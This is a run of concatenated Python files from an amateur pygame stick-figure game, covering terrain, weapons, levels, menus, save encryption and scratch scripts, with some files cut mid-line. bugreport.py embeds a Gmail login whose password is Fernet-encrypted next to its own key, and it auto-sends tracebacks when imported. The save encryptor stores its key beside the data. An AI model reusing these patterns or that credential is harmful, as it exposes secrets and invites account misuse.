print(self.px_to_blocks(x), bottom_blocks)
return self.get_solid((self.px_to_blocks(x), bottom_blocks))
def get_spawn_point(self, x, size_of_obj):
"""get a proper spawn point on Y axis for object."""
blk_size = self.terrain2dlist_texts[self.template]['size']
last_unsolid = self.blocks_to_px(self.get_last_unsolid(self.px_to_blocks(x)))
first_solid = last_unsolid + blk_size
return first_solid - size_of_obj
def px_to_blocks(self, pixels):
"""convert blocks to pixels"""
return round(pixels / self.terrain2dlist_texts[self.template]['size'])
def is_in_air(pos, terrain, size):
"""return true if the position is in air. if not, return false."""
array = terrain.terrain2dlist_texts[terrain.template]['text']
x, y = pos
y += size
try:
column = array[:, terrain.px_to_blocks(x)]
except IndexError:
return False
block = column[terrain.px_to_blocks(y)]
return terrain.is_air(block)
def is_underground(pos, terrain, size):
"""return true if any part of the object is underground."""
array = terrain.terrain2dlist_texts[terrain.template]['text']
x, y = pos
y += size
print(array, 'howdy ho')
column = array[:, terrain.px_to_blocks(x)]
block = column[terrain.px_to_blocks(y)]
return terrain.is_solid(block)
def _change_colour_surface(surface, r, g, b):
"""changes the colour of all parts of a
surface except for the transparent parts.
"""
arr = pg.surfarray.pixels3d(surface)
arr[:, :, 0] = r
arr[:, :, 1] = g
arr[:, :, 2] = b
def saveall():
Terrain('dirt').save_all('binaries')
def main2():
t = Terrain('dirt', 'drop')
t.load_text()
print(t.terrain2dlist_texts[t.template]['text'][:, 1])
t.build_surface()
pg.image.save(t.built_image, "C:\\Users\\Micha\\OneDrive\\Desktop\\hi.png")
print(is_in_air((100, 315), t, 5))
if __name__ == '__main__':
main2()
"""
this class is the base class
for all things like enemies, and characters.
"""
import pygame as pg
import threading
class IDontKnowWhatToCallItYet:
def start_thread(self, **kwargs):
self.mainthread = threading.Thread(
target=self.mainloop, daemon=True, **kwargs)
self.mainthread.start()
def mainloop(self):
pass
# this needs to be figured out yet.
# i figure i can do that when i get more
# of the workings figured out
def kill_thread(self):
self.
import os
import pygame
try:
from _internal import *
except ImportError:
from ._internal import *
__all__ = ['Weapon']
class Weapon:
cooldown = 0
def __init__(self, klass, name, colour, level, attack, range, alphatocolour=None):
self.largeicon = PICS['weapons']['large_icon'][klass][repr(level)][
colour]
self.smallicon = PICS['weapons']['small_icon'][klass][repr(level)][
colour]
if alphatocolour is not None:
change_alpha_to_colour(self.largeicon, alphatocolour)
change_alpha_to_colour(self.smallicon, alphatocolour)
self.name = name
self.colour = colour
self.range = range
self.attack = attack
rect = self.largeicon.get_rect()
pos = rect.bottomright[0] - 4, rect.bottomright[1] - 9
font = pygame.font.Font('freesansbold.ttf', 8)
print(font.size('8'))
surf = font.render(repr(level), True, COLOURS['black'])
self.largeicon.blit(surf, pos)
def can_attack(self):
"""return true if the weapon is able to attack."""
return self.cooldown == 0
def update(self):
if self.cooldown != 0: self.cooldown -= 1
def attack_enemy(self, target):
self.cooldown = self.attack.cooldown
target.hit(self.attack)
if __name__ == '__main__':
pygame.init()
a = pygame.display.set_mode((1000, 1000))
a.fill(COLOURS['blue'])
a.blit(
Weapon('sword', 'grey', 1, {
100: COLOURS['dark brown'],
150: COLOURS['brown']
}).largeicon, (0, 0))
while 1:
for ev in pygame.event.get():
if ev.type == 12:
raise SystemExit
pygame.display.update()
"""
_internal.py - a VERY messy module that i
kind of hate myself for making, but a lot of my
files in the class_ library rely on it
(if i could remove it, I would) :(
"""
from pprint import pprint
import os
import sys
import pygame as pg
from pygame.locals import *
import random
CHANGE_COLOUR_DIRS = ('characters_parts',
'heads',
'attacks',
'sword',
'bow',
'knife',
'spear',
'wand',
)
# print(sys.executable, 'HOWDY HO')
pg.init()
BACKWARDS = 'backwards'
FORWARDS = 'forwards'
DIR = '..\\' if os.getcwd().endswith('class_') else ''
__author__ = 'NOT Michael Gill'
__version__ = '0.0'
VALID_ENEMY_HEADS = ['smile', 'frown', 'triangle']
COLOURS = {
'brown': (101, 67, 33),
'dark brown': (210, 105, 30),
'azure': (0, 127, 255),
'light azure': (135, 206, 235),
'light beige': (225, 198, 153),
'beige': (232, 202, 145),
'green': (0, 128, 0),
'blue': (0, 0, 128),
'light green': (109, 227, 59),
'light blue': (173, 216, 230),
'light red': (250, 128, 114),
'red': (128, 0, 0),
'dark red': (255, 0, 0),
'dark blue': (0, 0, 255),
'dark green': (0, 255, 0),
'black': (0, 0, 0),
'light black': (211, 211,
211), # names like this are stupid, but must be used
'aqua': (0, 255, 255),
'white': (255, 255, 255),
'teal': (0, 128, 128),
'purple': (128, 128, 0),
'light purple': (177, 156, 217),
'light yellow': (255, 255, 224),
'light cyan': (224, 255, 255),
'light grey': (211, 211, 211),
'dark purple': (255, 255, 0),
'yellow': (255, 255, 0),
'silver': (192, 192, 192),
'gold': (192, 192, 96),
'grey': (211, 211, 211),
'cyan': (175, 238, 238),
}
COLOURS['gray'] = COLOURS['grey']
COLOURS['light gray'] = COLOURS['light grey']
COLOURS['light gronce'] = COLOURS['light grey'] # for Zeodexic
COLOURS['gronce'] = COLOURS['grey']
def _gather_pics(dir='.'):
dictionary = {}
enddir = os.path.split(dir)[-1]
for item in os.listdir(dir):
if '.' in item:
pname, extension = [x.lower() for x in item.split('.')]
fname = os.path.join(dir, item)
if os.path.isdir(os.path.join(dir, item)):
dictionary[item] = _gather_pics(fname)
elif extension in ('png', 'jpg'):
dictionary[pname] = pg.image.load(fname)
if enddir in CHANGE_COLOUR_DIRS:
# heads, attacks, and weapons should be of each colour
# print(dir)
di = dictionary[pname] = {}
for col in COLOURS:
# print(dir, col)
rgb_col = COLOURS[col]
di[col] = pg.image.load(os.path.join(dir, item))
change_colour_surface(di[col], *rgb_col)
return dictionary
def change_colour_surface(surface, r, g, b):
"""changes the colour of all parts of a
surface except for the transparent parts.
"""
arr = pg.surfarray.pixels3d(surface)
arr[:, :, 0] = r
arr[:, :, 1] = g
arr[:, :, 2] = b
# def change_alpha_to_colour(surface, colour):
# """changes all the alpha values in surface
# to colour.
# """
# alpha = pg.surfarray.pixels_alpha(surface)
# for line in alpha:
# for index in range(len(alpha)):
# if line[index] != 0:
# line[index] =
PICS = _gather_pics(os.path.join(DIR, 'data'))
# print(DIR)
TDIR = os.path.join(DIR, 'terrains')
"""characters.py- a module of subclasses
each of these classes is a class of stickman from
stickmanranger.
"""
DEFAULT_STATS = (50, 0, 0, 0, 0)
def change_alpha_to_colour(surf, alpha_to_colour):
# print(alpha_to_colour)
for alpha_value, colour in zip(alpha_to_colour.keys(),
alpha_to_colour.values()):
alpha = pg.surfarray.pixels_alpha(surf)
colours = pg.surfarray.pixels3d(surf)
# print(alpha)
for i, index1 in zip(alpha, range(len(alpha))):
for val, index in zip(i, range(len(i))):
if val == alpha_value:
colours[index1][index] = colour
alpha[index1][index] = 255
def _Box(size, colour, pos, surface, alpha=None, image=None) -> tuple:
"""
return a square rectangle, surface pair
uses MyRect
"""
# print(pos)
new_surf = pg.surface.Surface(size)
new_surf.fill(colour)
if alpha is not None:
new_surf.set_alpha(alpha)
surface.blit(new_surf, pos)
if image is not None:
surface.blit(image, pos)
return MyRect(new_surf.get_rect(topleft=pos)), new_surf
# pprint(PICS)
"""
__init__.py- this is the only module that will
be loaded on calling 'import class_', so i thought
it would be good to bundle everything in here.
it is expected that this will only be called
from .., so this should be fine
"""
try:
from .screen import Screen, PeacefulScreen
from .backgroundimage import BackGroundImage
from .stage import Stage
from .inventory import InventoryHandler
from .enemy_head import EnemyHead
from .my_rect import MyRect
from .smr_error import SMRError
from .terrain import Terrain
from .weapon import *
from .characters import *
from .enemies import *
from .attack import Attack
import class_.enemies
import class_.klass
except SystemError:
from attack import Attack
from inventory import InventoryHandler
from screen import Screen, PeacefulScreen
from backgroundimage import BackGroundImage
from stage import Stage
from enemy_head import EnemyHead
from my_rect import MyRect
from smr_error import SMRError
from terrain import Terrain
from weapon import *
from characters import *
from enemies import *
import enemies
import klass
import json as _json
import os
import enum
import pygame as _pg
_pg.mixer.pre_init(44100, 16, 2, 4096)
_pg.init()
import save
import levelparser
import class_ as _class_
from class_.sprite import SMRSprite as SpriteUtils
_pg.display.set_caption("Stickman's New World")
_pg.display.set_icon(_pg.image.load(os.path.join('data', 'game_icon.png')))
_pg.mouse.set_visible(False)
SURFACE = _pg.display.set_mode((800, 600))
ALL_LEVELS = levelparser.get_levels(SURFACE)
_HOME = os.getenv('USERPROFILE') or os.getenv("HOME")
SAVE_DIR = os.path.join(_HOME, '.stickman_new_world')
class Area(enum.Enum):
"""area of the game currently."""
TITLE = 0
MAP = 1
STAGE = 2
PAUSE = 3
# dictionary of color strings containing RGB values
COLOURS = {
'brown': (101, 67, 33),
'dark brown': (210, 105, 30),
'azure': (0, 127, 255),
'light azure': (135, 206, 235),
'light beige': (225, 198, 153),
'beige': (232, 202, 145),
'green': (0, 128, 0),
'blue': (0, 0, 128),
'light green': (109, 227, 59),
'light blue': (173, 216, 230),
'light red': (250, 128, 114),
'red': (128, 0, 0),
'dark red': (255, 0, 0),
'dark blue': (0, 0, 255),
'dark green': (0, 255, 0),
'black': (0, 0, 0),
'light black': (211, 211,
211), # names like this are stupid, but must be used
'aqua': (0, 255, 255),
'white': (255, 255, 255),
'teal': (0, 128, 128),
'purple': (128, 128, 0),
'light purple': (177, 156, 217),
'light yellow': (255, 255, 224),
'light cyan': (224, 255, 255),
'light grey': (211, 211, 211),
'dark purple': (255, 255, 0),
'yellow': (255, 255, 0),
'silver': (192, 192, 192),
'gold': (192, 192, 96),
'grey': (211, 211, 211),
'cyan': (175, 238, 238),
}
#open = lambda file: __builtins__.open(os.path.join('config', file))
_DECODE = _json.JSONDecoder()
SETTINGS = _DECODE.decode(open(os.path.join('config', 'settings.json')).read())
ALL = _DECODE.decode(open(os.path.join('config', 'data.json')).read())
ALL_CLASSES = ['Swordsman', 'Spearman', 'Wizard', 'Archer', 'Angel']
# print(ALL)
ALL_TERRAINS = [
_class_.Terrain('dirt', 'flat'),
]
ALL_SCREENS = []
ALL_WEAPONS = []
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# "remember to add a 'Spicy Shot' magic book later." (Alvin Gu, Oct 26, 2018) #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
DEFAULT_WEAPONS = {
'angel': _class_.Weapon('knife', 'Knife', 'black', 1, _class_.Attack(4, 20), 3),
'swordsman': _class_.Weapon('sword', 'Sword', 'gray', 1, _class_.Attack(7, 60), 7),
'spearman': _class_.Weapon('spear', 'Spear', 'gray', 1, _class_.Attack(5, 50), 12),
'archer': _class_.Weapon('bow', 'Bow', 'brown', 1, _class_.Attack(3, 30), 130),
'wizard': _class_.Weapon('wand', "Beginner's Spellbook", 'blue', 1, _class_.Attack(15, 120), 70),
}
ALL_COMPOS = []
import picture_collect
PICS = picture_collect.gather_pics('data')
if os.path.exists(SAVE_DIR):
_SAVE = save.read_file()
print(_SAVE)
_INV_RAW = _SAVE['inventory']
x, y = max([int(i.split('x')[0]) for i in _INV_RAW]), max(
[int(i.split('x')[1]) for i in _INV_RAW])
_INV = _class_.InventoryHandler(x, y)
_INV.sort_dict(_INV_RAW)
MAIN_GAME_STATE = {
'AREA': 0,
'TERMINAL': None,
'SETTINGS': SETTINGS,
'GAME_DATA': _SAVE,
'INVENTORY': _INV,
'MAIN_DISPLAY_SURF': SURFACE,
'CURSOR': PICS['cursor'],
}
else:
MAIN_GAME_STATE = {
'AREA': 0,
'TERMINAL': None,
'SETTINGS': SETTINGS,
'GAME_DATA': {},
'INVENTORY': {},
'MAIN_DISPLAY_SURF': SURFACE,
'CURSOR': PICS['cursor'],
}
"""
encrypt.py- encrypter for stickmanranger save files.
I want people to be able to mad this game, but i dont
necessarily want people to be able to change it up
super easily!"""
from cryptography.fernet import Fernet
from itertools import count
import os
import shutil
import time
if not os.name == 'nt':
os.getlogin = lambda: __import__('pwd').getpwuid(os.getuid())[0]
CURRENT_TIME = time.asctime()
PATH = {
'nt': 'C:\\Users\\{}\\.stickman_new_world\\save\\'.format(os.getlogin()),
'posix': '/home/{}/.stickman_new_world/save/'.format(os.getlogin()),
}[os.name]
PATH_NUMERIC = os.path.join(PATH, '%s') + '\\' if os.name == 'nt' else '/'
print(PATH_NUMERIC)
if not os.path.exists(PATH):
os.makedirs(PATH)
FILE = PATH + '.smr-save'
print(FILE)
def encrypt(string):
if not os.path.exists(PATH):
os.makedirs(PATH)
prev_key = os.listdir(PATH)
for f in prev_key:
if not f in ('.smr-save', 'time'):
os.remove(PATH + f)
prev_dir = 0
for number in count():
if os.path.exists(PATH_NUMERIC % number):
prev_dir = number
else:
# the system can't find this file, but it will only
# be the first one it doesnt find.
prev_dir = number
break
def_path = PATH
# os.mkdir(def_path)
key = Fernet.generate_key()
# simply make a file with that name
with open(def_path + key.decode(), 'w'):
pass
encrypter = Fernet(key)
cipher = encrypter.encrypt(string.encode())
with open(FILE, 'wb') as cipher_file:
cipher_file.write(cipher)
with open((os.path.join(def_path, 'time')), 'w') as time_file:
time_file.write(CURRENT_TIME)
return cipher
def decrypt(spec=None):
prev_dir = spec
if spec is None:
prev_dir = 0
for number in count():
if os.path.exists(PATH_NUMERIC % number):
prev_dir = number
else:
# the system can't find this file, but it will only
# be the first one it doesnt find.
break
data = open(FILE, 'rb').read()
key = os.listdir(PATH)
key.pop(key.index('.smr-save'))
key.pop(key.index('time'))
key = key[0].encode()
encrypter = Fernet(key)
text = encrypter.decrypt(data).decode()
saved_time = open(os.path.join(PATH, 'time')).read()
return text, saved_time
if __name__ == '__main__':
time = __import__('time').asctime()
print(encrypt(open('misc\\shello.ini').read()))
print(decrypt()[0], decrypt()[1], sep='\n\n\n')
"""gameplay.py- main gameplay file.
handle all events in this file, display terrain, handle deaths,
status effects, etc...
"""
from pygame.locals import QUIT, MOUSEBUTTONDOWN
import pygame as pg
from database import MAIN_GAME_STATE, PICS, ALL_LEVELS, Area
SURFACE = MAIN_GAME_STATE['MAIN_DISPLAY_SURF']
PLAY_AREA = pg.Rect((800, 400), (0, 0))
MENU_AREA = pg.Rect((800, 200), (0, 400))
CLOCK = pg.time.Clock()
FPS = 60
def main():
"""run the game, after the title screen."""
continue_ = True
menu = pg.Surface((800, 200))
menu.fill((0, 255, 0))
MAIN_GAME_STATE['MOUSEDOWN'] = False
while continue_:
MAIN_GAME_STATE['MOUSE_POS'] = pg.mouse.get_pos()
events = [event for event in pg.event.get()]
if MAIN_GAME_STATE['AREA'] == Area.MAP:
draw_map()
handle_map()
elif MAIN_GAME_STATE['AREA'] == Area.STAGE:
MAIN_GAME_STATE['STAGE'].update(events)
MAIN_GAME_STATE['MAIN_DISPLAY_SURF'].blit(MAIN_GAME_STATE['CURSOR'], pg.mouse.get_pos())
# MAIN_GAME_STATE['MAIN_DISPLAY_SURF'].blit(menu, (0, 400))
pg.display.update()
CLOCK.tick(FPS)
def draw_map():
"""draw the map to the screen, and all stages."""
SURFACE.blit(PICS['Maps']['complete'], (0, 0))
for stage in ALL_LEVELS:
stage.draw_on_map()
def handle_map():
pos = pg.mouse.get_pos()
print(pos)
for stage in ALL_LEVELS:
stage.check_hover(pos)
for event in pg.event.get():
check_quit(event)
if event.type == MOUSEBUTTONDOWN and stage.rect.collidepoint(*event.pos):
stage.init(MAIN_GAME_STATE)
MAIN_GAME_STATE['STAGE'] = stage
MAIN_GAME_STATE['AREA'] = Area.STAGE
def check_quit(event):
"""check if event is a quit event. if it is, quit."""
if event.type == QUIT:
pg.quit()
raise SystemExitprint("Hello")
with open('file.txt', 'w') as openfile:
openfile.write('Hello')
import threading
import tkinter.messagebox
threading.Thread(
target=lambda: tkinter.messagebox.showmessage('hi', 'hi')).start()
from queue import Queue
Q = Queue()
def p():
print(Q.get())
t = threading.Thread(target=p)
t.start()
while True:
Q.put(input('type to send a message to t: '))
"""levelparser: converts a JSON level into a Stage object."""
import json
import pygame
import class_
def get_levels(mainsurf):
"""parse and return all levels in levels.json."""
levels = json.load(open("levels.json"))
print(levels.keys(), levels.values())
stages = []
for name, items in zip(levels, levels.values()):
screens = []
for obj in items['screens']:
enemies = {}
for enemy in obj['enemies']:
enemy_obj = getattr(class_, enemy['type'])(
enemy['colour'],
class_.EnemyHead(*enemy['head']),
enemy['drops'],
enemy['droprates'],
class_.Attack(*enemy['attack']),
enemy['health'],
enemy['range'],
enemy['size'],
)
enemies[enemy_obj] = enemy['amount']
screens.append(class_.Screen(enemies))
print(json.dumps(items, indent=4))
stage = class_.Stage(
name,
position_on_map=tuple(items['position']),
all_screens=screens,
boss_screen=items['boss_screen'],
surface=mainsurf,
terrain=class_.Terrain(
items['terrain']['texture'], items['terrain']['template']),
comes_from=items['comes_from'],
)
stages.append(stage)
return stages
# hi
get_levels(pygame.Surface((1, 1)))#!/usr/bin/python3
# main.py
"""
the main code for the game stickman ranger, a game similar to stick ranger(www.dan-ball.jp/en/javagame/ranger)
the goal is to defeat bosses and not get killed.
project started: oct. 20, 2017.
first level release goal: march 1, 2018
source code by Michael Gill
original SR by Ha55ii
this game is built on pygame, an excellent game engine for python
thanks to paint.net, which I made the sprites on.
UPDATE: May 18
Oh my goodness i look back at this code after so long of ignoring main.py
i kind of hate this module now.
oh well, it works, i suppose. for now
By the way, i wasnt even close to my intended release date :)
"""
__author__ = 'Michael Gill'
__version__ = '0.0'
__all__ = ['draw_box', 'draw_text', 'terminate', 'main']
import sys
import time
from pygame.locals import QUIT, MOUSEBUTTONDOWN, MOUSEBUTTONUP, MOUSEMOTION
import pygame as pg
# local imports
#import save
import database
import class_
import dicts
from dicts import COLOURS
import check_update
### constant values ###
##### IMPORTANT! REMEMBER CARTESIAN SYSTEM! ######
##### 0 FOR BOTH COORDINATES START IN TOP LEFT ###
NUM_OF_CHARS = 4
###functionality begins here! (YAY! FINALLY)###
def main():
"""
main functionality begins here
"""
check_update.main()
global CLOCK, SURFACE, PICS
flag = True
# for stopping the game loop when clicked, stop clutter.
pg.init()
PICS = dicts.gather_pics('data')
print(PICS)
SURFACE = database.SURFACE
CLOCK = pg.time.Clock()
pg.display.set_caption('StickMan Ranger')
pg.display.set_icon(PICS['game_icon'])
SURFACE.blit(PICS['Title_Screen'], (0, 0))
while flag: # main loop:
for ev in pg.event.get():
if ev.type == QUIT:
terminate()
elif ev.type == MOUSEBUTTONDOWN:
cho = choose_game_mode()
flag = False
pg.display.update()
print('main event loop terminated')
# print functions in this code are for debugging purposes only
if cho is 0:
char_list = get_keys_from_pics(get_characters())
clear_screen()
char_string = '\n'.join(char_list)
draw_text(char_string, size=45)
SURFACE.blit(PICS['Maps']['half_complete'], (0, 0))
while True:
for event in pg.event.get():
if event.type == QUIT:
terminate()
pg.display.update()
def choose_game_mode() -> int:
"""
choose which option the player wants
return 1 if player chooses new game
return 2 if player chooses load game
return 3 if player chooses load a backup.
"""
print('choose_game_mode called')
SURFACE.fill(COLOURS['white'])
# I realize now that Ishould have used a function for the three sections
# below, but whatever.
LabelPlay = pg.font.Font('data\\Michael`s Font.ttf', 32)
PlaySurf = LabelPlay.render('New Game', True, COLOURS['black'],
COLOURS['white'])
PlayRect = class_.MyRect(PlaySurf.get_rect())
PlayRect.center = ((WIN_X // 2), (WIN_Y // 2) - 50)
SURFACE.blit(PlaySurf, PlayRect)
#################################################################
LabelLoad = pg.font.Font('data\\Michael`s Font.ttf', 32)
LoadSurf = LabelLoad.render('Load Game', True, COLOURS['black'],
COLOURS['white'])
LoadRect = class_.MyRect(LoadSurf.get_rect())
LoadRect.center = (WIN_X // 2, WIN_Y // 2)
SURFACE.blit(LoadSurf, LoadRect)
#################################################################
LabelLoadEarlier = pg.font.Font('data\\Michael`s Font.ttf', 32)
LESurf = LabelLoadEarlier.render('Load Earlier Save', True,
COLOURS['black'], COLOURS['white'])
LERect = class_.MyRect(LESurf.get_rect())
LERect.center = (WIN_X // 2, WIN_Y // 2 + 50)
SURFACE.blit(LESurf, LERect)
while True:
for event in pg.event.get():
if event.type == QUIT:
terminate()
elif event.type == MOUSEMOTION:
x, y = event.pos
for (rect, surf) in ((PlayRect, PlaySurf),
(LoadRect, LoadSurf), (LERect, LESurf)):
rect.handle(event, SURFACE, surf)
elif event.type == MOUSEBUTTONDOWN:
x, y = event.pos
if PlayRect.collidepoint(x, y):
print("PlayRect Clicked")
return 0 # these return value, and end loop
elif LoadRect.collidepoint(x, y):
print("LoadRect Called")
return 1
elif LERect.collidepoint(x, y):
print("LERect called")
return 2
pg.display.update()
def draw_text(
text,
size=32,
cen_of_txt=(WIN_X // 2, WIN_Y // 2),
colour=(COLOURS['black'], COLOURS['white']),
) -> tuple:
"""
function for drawing text on SURFACE,
returns a tuple containing the rect
of the surface, and the surface
itself.
"""
FontObj = pg.font.Font('data\\Michael`s Font.ttf', size)
FontSurf = FontObj.render(text, True, *colour)
Rect = FontSurf.get_rect()
Rect.center = cen_of_txt
SURFACE.blit(FontSurf, Rect)
return class_.MyRect(Rect, colour=COLOURS['white']), FontSurf
def draw_box(size, colour, pos, alpha=None, image=None) -> tuple:
"""
return a square rectangle, surface pair
uses MyRect
"""
print(pos)
new_surf = pg.surface.Surface(size)
new_surf.fill(colour)
if alpha is not None:
new_surf.set_alpha(alpha)
SURFACE.blit(new_surf, pos)
if image is not None:
SURFACE.blit(image, pos)
return class_.MyRect(
new_surf.get_rect(topleft=pos), colour=colour), new_surf
def terminate():
"end the current pygame program"
# need to save the game... put some function call
pg.quit()
sys.exit()
def get_characters() -> list:
"""
starts a new game,
and lets the player choose
their characters.
returns a list of the characters
the player has chosen.
"""
SURFACE.fill(COLOURS['white'])
draw_text(
'Choose your players:', cen_of_txt=(WIN_X // 2, WIN_Y // 2 - 200))
texts = {}
pairs = []
num = -250 # this is the starting point for the images to appear
# puts all the characters in a line with their caption beneath
for string in database.ALL_CLASSES:
string = string.lower()
texts[string] = draw_text(
string, size=20, cen_of_txt=(WIN_X // 2 + num, WIN_Y // 2 + 200))
pic = PICS['characters'][string]
SURFACE.blit(pic, (texts[string][0].x + 20, texts[string][0].y + 30))
pairs.append((string, class_.MyRect(pic.get_rect())))
num += 100
del num, string
box_list = []
# this loop puts 4 boxes to show which characters the user has chosen
for i in range(WIN_X // 4, WIN_X // 4 * 3, 100):
box_list.append((draw_box(
(25, 25), COLOURS['gray'], (i, WIN_Y // 2), alpha=200),
(i, WIN_Y // 2))[0][0])
del i
print('pairs: ', *pairs, sep='\n')
char_list = []
clicked = 0
boxes_with_pictures = []
box_num_pairs = {
1: box_list[0],
2: box_list[1],
3: box_list[2],
4: box_list[3],
}
for key in box_num_pairs:
print('key: ', key, ' box: ', box_num_pairs[key], sep='')
while True:
for event in pg.event.get():
if event.type == QUIT:
terminate()
elif event.type == MOUSEMOTION:
for key in texts:
M = texts[key]
M[0].handle(event, SURFACE, M[1])
# this branch controls when a selection box is
# selected, which one to underline.
elif event.type == MOUSEBUTTONDOWN: # if mouse is clicked
x, y = event.pos
for key, rect in zip(box_num_pairs.keys(),
box_num_pairs.values()):
print(rect is box_num_pairs[key])
if rect.collidepoint(x, y):
# if click is in 'rect'
if not rect.underlined:
# only do this is 'rect' is underlined
rect.underline(SURFACE)
if clicked == key:
box_num_pairs[clicked].remove_underline(SURFACE)
clicked = 0
elif clicked == 0:
clicked = key
else:
box_num_pairs[clicked].remove_underline(SURFACE)
clicked = key
for rect_key, rect in zip(box_num_pairs.keys(),
box_num_pairs.values()):
for character_name, rect_surf_pair in zip(
texts.keys(), texts.values()):
if rect_surf_pair[0].collidepoint(x, y):
print('garpenchank')
try:
box_num_pairs[clicked].draw_inside(
PICS['characters'][character_name],
SURFACE)
boxes_with_pictures.append(clicked)
except (class_.SMRError, KeyError) as error:
print(error)
break
elif clicked in boxes_with_pictures:
print('gud')
box_num_pairs[clicked].remove_pic(SURFACE)
char_list = [
box.PicInside for box in box_num_pairs.values()
]
pg.display.update()
if not None in char_list[:2]:
print('howdy')
char_list = [box.PicInside for box in box_num_pairs.values()]
if not None in char_list:
return char_list
def clear_box(pos):
"""
clears the box that needs to be cleared.
"""
print('in the function clear_box')
draw_box((25, 25), COLOURS['white'], pos)
draw_box((25, 25), COLOURS['gray'], pos, alpha=100)
def change_colour_surface(surface, r, g, b):
"""changes the colour of all parts of a
surface except for the transparent parts.
"""
arr = pg.surfarray.pixels3d(surface)
arr[:, :, 0] = r
arr[:, :, 1] = g
arr[:, :, 2] = b
def get_keys_from_pics(orig_list):
"""
returns a dict that has keys of the original
dict that the pics were contained in. for example:
get_keys_from_pics(gladiator_pic)
will return:
{'gladiator': <class 'pygame.Surface' object>}
note: if an item doesnt match, for example a
string, or a picture not in data/characters,
nothing will be done with it.
"""
pics_dict = PICS['characters']
new_dict = {}
for key, value in zip(pics_dict.keys(), pics_dict.values()):
for picture in orig_list:
if picture == value:
new_dict[key] = value
return new_dict
def clear_screen():
return SURFACE.fill(COLOURS['white'])
if __name__ == '__main__':
main()
else:
print('why on earth are you importing this?\n\
it is supposed to a main module!')
"""menu.py- handle the menu at the bottom of the screen."""
"""
bugreport.py
this module takes any exception, the app name,
and any other info, and reports it to my email.
"""
import io
import os
import smtplib
from cryptography.fernet import Fernet
import sys
import threading
import traceback
import platform
FYUKYFVKFYVHUFL = b'gAAAAABavaf20Qc-jiOnPXzOsBfr-yhJiVbuBEiyK4cJA3r82f0wXAp5gdgPQ43UxZB7H9O9RgiTCHDb0ngh9CNCRPi03nQssg=='
HIUEFWILEIURFHE = b'_qJoI0kXZlQuHI0-U8BSSKuKQ_Zpp3vQMZGrPKMk8lI='
TMP = os.path.join(
'/tmp/', 'stderr.tmp') if os.name == 'posix' else os.path.join(os.getenv('TMP'), 'stderr.tmp')
def main(project_name, exception, *other_info):
"""
main function for sending mail.
"""
exception.args = [str(arg) for arg in exception.args]
print(exception.args)
exception_traceback_details, exception_message = get_details(exception)
email = build_message(project_name, exception_message,
exception_traceback_details, *other_info)
send_message(email)
def send_message(message):
"""
sends message to the bug report address
"""
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
# i dont want random people just emailing me!!
decrypter = Fernet(HIUEFWILEIURFHE)
data = decrypter.decrypt(FYUKYFVKFYVHUFL).decode()
server.ehlo()
server.login('bugreporter.smr@gmail.com', data)
server.sendmail('bugreporter.smr@gmail.com',
'bugreporter.smr@gmail.com', message)
server.close()
def build_message(project, tbmessage, details, *args):
"""
build and return a email that contains the
traceback.
"""
bottomline = ',\n'.join(args) if len(args) > 0 else 'Nope'
sender = reciever = 'bugreporter.smr@gmail.com'
name = os.name
build = platform.platform()
email_string = f"""
From: {sender}
To: {reciever}
Subject: bug in {project} on a {name} system :(
platform:
{build}
details (traceback):
{details}
the message (even though it showed up before):
{tbmessage}
any extra things?
{bottomline}
sincerely, automatic message that has no heart :)
"""
return email_string
def get_details(exception):
"""
return the details of the traceback
"""
tbstring = ''.join(traceback.format_exception(
type(exception), exception, exception.__traceback__))
tbargs = ', '.join(exception.args)
return tbstring, tbargs
def default_smr(exception, *args):
main('stickman\'s new world', exception, *args)
try:
raise SyntaxError
except BaseException as e:
main('test', e)
"""
dirtools.py
this modules aim is to do stuff.
"""
import os
import io
def gather_tree(dir='.', inputmethod=io.TextIOWrapper.read, previousdict=None):
"""
gathers this tree into a dict.
directories will become sub-dictionaries.
files will become
import pygame as pg
pg.init()
a = pg.font.Font('freesansbold.ttf', 32)
s = pg.Surface((100, 100))
s.fill((255, 255, 255))
s.blit(a.render('hello', True, (0, 0, 0)), (0, 0))
pg.image.save(s, 'C:\\Users\\michael\\desktop\\s.png')import os
os.chdir(r'C:\Users\Michael\Desktop\stickmanranger')
print(
'hi! I am formatting your files in your current project, stickmanranger!')
for i in os.listdir():
try:
if i.endswith('.py'):
print('formatting %a' % i)
os.system('yapf -i %s' % i)
except:
pass
print('done!')
import time
time.sleep(1)
import math
import pygame as pg
from pygame.locals import QUIT
FPS = 20
CLOCK = pg.time.Clock()
class GravityItem:
weight = 10 # weight is amount of pixels it should move down per frame - momentum
sizey = sizex = 10
def __init__(self, img, pos):
self.img = img
self.update_coords(pos)
def update_coords(self, pos):
self.topleft = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
def draw(self, surface, override_pos=None):
if override_pos is not None:
self.update_coords(override_pos)
surface.blit(self.img, self.topright)
def move_gravity_momentum(self, momentum, px_x):
to_move = momentum - self.weight
# if momentum is greater than weight, it will move up
self.update_coords((
self.topright[0] - px_x,
self.topright[1] + to_move,
))
def get_top_of_arc(self, enemy_pos):
# use parabola, thx to Dracobot
def main():
mainsurf = pg.display.set_mode((400, 400))
sprite = pg.Surface((10, 10))
sprite.fill((0, 255, 0))
gv = GravityItem(sprite, (200, 200))
while True:
for event in pg.event.get():
if event.type == QUIT:
pg.quit()
raise SystemExit
gv.move_gravity_momentum(10, 1)
gv.draw(mainsurf)
pg.display.flip()
CLOCK.tick(FPS)
mainsurf.fill((255,) * 3)
if __name__ == '__main__':
main()from multiprocessing import *
import time
def s():
time.sleep(1)
print('hi!')
class Main():
def do(self):
print('hi!')
time.sleep(1)
def start(self):
def a():
pass
self.s = Process(target=a)
self.s.start()
if __name__ == '__main__':
Main().start()
Main().start()
# this is a stupid comment
pass
import sys
import threading
try:
import chwsuakeuegy
except Exception as l:
d = l
def raise_d():
raise d
sys.stderr = open('C:\\users\\michael\\desktop\\stderr.txt', 'w')
def raise_d():
raise d
raise_d()
print('??')
sys.stderr.close()
import pygame
from pygame.locals import *
# --- constants --- (UPPER_CASE names)
SCREEN_WIDTH = 430
SCREEN_HEIGHT = 410
#BLACK = ( 0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
FPS = 30
# --- classses --- (CamelCase names)
# empty
# --- functions --- (lower_case names)
# empty
# --- main ---
